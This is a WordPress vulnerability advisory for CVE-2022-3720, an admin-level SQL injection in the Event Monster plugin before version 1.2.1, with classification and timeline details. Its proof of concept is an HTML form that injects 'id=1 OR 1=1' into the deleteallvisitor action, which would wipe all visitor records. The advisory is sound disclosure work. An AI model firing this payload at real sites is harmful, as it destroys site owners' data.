WordPress Plugin Vulnerabilities

Event Monster < 1.2.1 - Admin+ SQLi

Description

The plugin does not validate and escape some parameters before using them in SQL statements, which could lead to SQL Injection exploitable by high privilege users

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/edit.php?post_type=awl_event_monster&page=em-visitors-page" method="POST">
      <input type="hidden" name="action" value="deleteallvisitor" />
      <input type="hidden" name="nonce" value="XXXXX" />
      <input type="hidden" name="id" value="1 OR 1=1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
event-monster
Fixed in 1.2.1

References

CVE
CVE-2022-3720

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
Thura Moe Myint
Submitter
mgthuramoemyint
Submitter twitter
mgthuramoemyint
Verified
Yes
WPVDB ID
0139a23c-4896-4aef-ab56-dcf7f07f01e5

Timeline

Publicly Published
2022-10-31 (about 1 years ago)
Added
2022-10-31 (about 1 years ago)
Last Updated
2022-10-31 (about 1 years ago)

Other

Published
Title
Published
2022-04-05
Title
Documentor <= 1.5.3 - Unauthenticated SQLi
Published
2014-08-01
Title
Simple Retail Menus 4.0.1 - includes/mode-edit.php targetmenu Parameter SQL Injection
Published
2022-05-30
Title
Events Made Easy < 2.2.81 - Unauthenticated SQLi
Published
2021-05-03
Title
Activity Log < 2.7.0 - Authenticated SQL Injection
Published
2021-11-18
Title
WP User Frontend < 3.5.25 - Admin+ SQL Injection